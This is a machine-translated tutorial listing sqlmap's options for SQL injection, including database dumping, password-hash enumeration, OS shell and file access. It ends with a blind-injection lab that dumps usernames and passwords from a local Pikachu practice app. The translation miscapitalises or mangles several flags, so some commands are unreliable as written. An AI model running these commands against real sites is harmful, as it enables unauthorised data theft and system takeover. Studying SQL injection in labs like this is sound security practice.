Sqlmap use-blind injection small experiment

table of Contents

Introduction to sqlmap

Basic format

sqlmap detailed commands:

Options:

Target:

Request:

Enumeration:

Optimization:

Injection:

Detection:

Techniques:

Fingerprint:

Brute force:

File system access:

Operating system access:

Windows registry access:

Miscellaneous (Miscellaneous):

Blind injection experiment


Introduction to sqlmap

sqlmap supports five different injection modes:

  • 1. Blind injection based on Boolean, that is, injection that can judge whether the condition is true or false according to the return page.
  • 2. Time-based blind injection, that is, you cannot judge any information based on the content of the page return. Use conditional statements to check whether the time delay statement is executed (that is, whether the page return time increases) to judge.
  • 3. Inject based on error, that is, the page will return an error message, or the result of the injected statement will be directly returned to the page.
  • 4. Joint query injection, injection in the case of union can be used.
  • 5. Heap query injection, injection during execution of multiple statements that can be executed at the same time

Basic format

sqlmap -u "http://www.vuln.cn/post.php?id=1"

Use level1 to detect all database types by default

sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3

Specify the database type as mysql and the level is 3 (5 levels in total, the higher the level, the more comprehensive the detection)

sqlmap detailed commands:

  • -Is-dba current user authority (whether it is root authority)
  • -Dbs all databases
  • --Current-db website current database
  • --Users all database users
  • --Current-user current database user
  • --Random-agent construct random user-agent
  • --Passwords database password
  • --Proxy http://local:8080 --threads 10 (thread acceleration can be customized) proxy
  • --Time-sec=TIMESEC DBMS response delay time (default is 5 seconds)

Options:

  • --Version display the version number of the program and exit
  • -h, --help show this help message and exit
  • -v VERBOSE Verbose level: 0-6 (default is 1)
  • Save the progress and continue to run:

sqlmap -u "http://url/news?id=1" -dbs-o "sqlmap.log" save progress
sqlmap -u "http://url/news?id=1" -dbs-o "sqlmap. log" -resume to restore the saved progress

Target:

At least one of the options needs to be set below to set the target URL.

  • -d DIRECT connects directly to the database.
  • -u URL, –url=URL target URL.
  • -l LIST parse the target from Burp or WebScarab proxy logs.
  • -r REQUESTFILE Load HTTP requests from a file.
  • -g GOOGLEDORK Process the result of Google dork as the target URL.
  • -c CONFIGFILE Load options from the INI configuration file.

Request:

These options can be used to specify how to connect to the target URL.

  • --Data=DATA data string sent via POST
  • --Cookie=COOKIE HTTP Cookie header
  • --Cookie-urlencode URL encoding generated cookie injection
  • --Drop-set-cookie ignore the response Set-Cookie header information
  • --User-agent=AGENT specifies HTTP User-Agent header
  • --Random-agent use randomly selected HTTP User-Agent header
  • --Referer=REFERER specify HTTP Referer header
  • --Headers=HEADERS separate lines and add other HTTP headers
  • --Auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) (Basic, Digest or NTLM)
  • --Auth-cred=ACRED HTTP authentication credentials (username: password)
  • --Auth-cert=ACERT HTTP authentication certificate (key_file, cert_file)
  • --Proxy=PROXY use HTTP proxy to connect to the target URL
  • --Proxy-cred=PCRED HTTP proxy authentication credentials (username: password)
  • --Ignore-proxy ignore the system default HTTP proxy
  • --Delay=DELAY The delay time between each HTTP request, in seconds
  • --Timeout=TIMEOUT wait time for connection timeout (default is 30 seconds)
  • --Retries=RETRIES time to reconnect after connection timeout (default 3)
  • --Scope=SCOPE The regular expression to filter the target from the provided agent log
  • --Safe-url=SAFURL URL address frequently visited during the test
  • --Safe-freq=SAFREQ test request between two visits, give a safe URL

Enumeration:

These options can be used to list the information of the back-end database management system, the structure and data in the table. In addition, you can also run
your own SQL statements.

  • -b, --banner Retrieve the ID of the database management system
  • --Current-user retrieve the current user of the database management system
  • --Current-db Retrieve the current database of the database management system
  • --Is-dba detects whether the current user of the DBMS is a DBA
  • --Users enumerate database management system users
  • --Passwords enumerate database management system user password hash
  • --Privileges enumerate the permissions of database management system users
  • --Roles enumerate the roles of database management system users
  • -Dbs enumerate database management system databases
  • -D DBname the specified database name to be enumerated
  • -T TBLname The specified database table to be enumerated (for example: -T tablename -columns)
  • --Tables enumerate the tables in the DBMS database
  • --Columns enumerate DBMS database table columns
  • -Dump dump the entries in the database of the database management system
  • --Dump-all dump all entries in the DBMS database table
  • -Search Search column (S), table (S) and/or database name (S)
  • -C COL database column to be enumerated
  • -U USER The database user used to enumerate
  • --Exclude-sysdbs exclude system databases when enumerating tables
  • --Start=LIMITSTART The first query output enters the search
  • --Stop=LIMITSTOP The output of the last query enters the search
  • --First=FIRSTCHAR Character search of the first query output word
  • --Last=LASTCHAR The output character search of the last query
  • --Sql-query=QUERY SQL statement to be executed
  • --Sql-shell prompt interactive SQL shell

Optimization:

These options can be used to optimize the performance of SqlMap.

  • -o Turn on all optimization switches
  • --Predict-output predict common query output
  • --Keep-alive use persistent HTTP(S) connection
  • --Null-connection retrieve page length from no actual HTTP response body
  • --Threads=THREADS Maximum concurrent HTTP(S) request (default is 1)

Injection:

These options can be used to specify which parameters to test, provide custom injection payloads and optional tampering scripts.

  • -p TESTPARAMETER testable parameters (S)
  • --Dbms=DBMS force the back-end DBMS to this value
  • --Os=OS force the back-end DBMS operating system to this value
  • --Prefix=PREFIX inject payload string prefix
  • --Suffix=SUFFIX inject payload string suffix
  • --Tamper=TAMPER use the given script(s) to tamper with the injected data

Detection:

These options can be used to specify how to parse and compare the content of the HTTP response page during blind SQL injection.

  • --Level=LEVEL The level at which the test is performed (1-5, the default is 1)
  • --Risk=RISK test execution risk (0-3, default is 1)
  • --String=STRING matches the string on the page when the query is valid
  • --Regexp=REGEXP matches the regular expression on the page when it is valid when querying
  • --Text-only compare pages based on text content only

Techniques:

These options can be used to adjust specific SQL injection tests.

  • --Technique=TECH SQL injection technology test (default BEUST)
  • --Time-sec=TIMESEC DBMS response delay time (default is 5 seconds)
  • --Union-cols=UCOLS fixed column range is used to test UNION query injection
  • --Union-char=UCHAR The character used for brute force guessing the number of columns

Fingerprint:

  • -f, --fingerprint perform a wide range of DBMS version fingerprints

Brute force:

These options can be used to run brute force checks.

  • --Common-tables check the existence of common tables
  • --Common-columns check the existence of common columns

User-defined function injection:
These options can be used to create user-defined functions.

--Udf-inject Inject user-defined functions
--shared-lib=SHLIB The local path of the shared library

File system access:

These options can be used to access the underlying file system of the back-end database management system.

  • --File-read=RFILE read files from the back-end database management system file system
  • --File-write=WFILE edit the local file on the file system of the back-end database management system
  • --File-dest=DFILE The absolute path of the file written by the back-end database management system

Operating system access:

These options can be used to access the underlying operating system of the back-end database management system.

  • --Os-cmd=OSCMD execute operating system commands
  • --Os-shell interactive operating system shell
  • --Os-pwn get an OOB shell, meterpreter or VNC
  • --Os-smbrelay One key to get an OOB shell, meterpreter or VNC
  • --Os-bof stored procedure buffer overflow utilization
  • --Priv-esc database process user privilege escalation
  • --Msf-path=MSFPATH Metasploit Framework local installation path
  • --Tmp-path=TMPPATH the absolute path of the remote temporary file directory

Windows registry access:

These options can be used to access the back-end database management system Windows registry.

  • --Reg-read read a Windows registry key value
  • --Reg-add write a Windows registry key value data
  • --Reg-del delete Windows registry keys
  • --Reg-key=REGKEY Windows registry key
  • --Reg-value=REGVAL Windows registry key value
  • --Reg-data=REGDATA Windows registry key data
  • --Reg-type=REGTYPE Windows registry key value type

These options can be used to set some general working parameters.

  • -t TRAFFICFILE record all HTTP traffic to a text file
  • -s SESSIONFILE save and restore all data of the retrieved session file
  • --Flush-session flush the session file of the current target
  • --Fresh-queries ignore the query results stored in the session file
  • -Eta displays the estimated time of arrival of each output
  • --Update Update SqlMap
  • --Save file save options to the INI configuration file
  • -Batch Never ask for user input, use all default configurations.

Miscellaneous (Miscellaneous):

  • --Beep alert when SQL injection is found
  • --Check-payload IDS's detection test for injected payloads
  • --Cleanup SqlMap specific UDF and table cleaning DBMS
  • --Forms Parsing and testing forms of the target URL
  • --Gpage=GOOGLEPAGE Use Google dork results from the specified page number
  • -Page-rank Google dork results show page rank (PR)
  • --Parse-errors parse the error messages of the database management system from the response page
  • --Replicate copy the dumped data to a sqlite3 database
  • -Tor Use the default Tor (Vidalia/ Privoxy/ Polipo) proxy address
  • --Wizard Simple wizard interface for novice users

Reference: http://www.vuln.cn/2035

Blind injection experiment

Experiment with a blind injection and pass in parameter 11

View current information: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2"

View the current database: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" --current-db

View table name:

sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

View column names: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users- -columns

View username and password: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump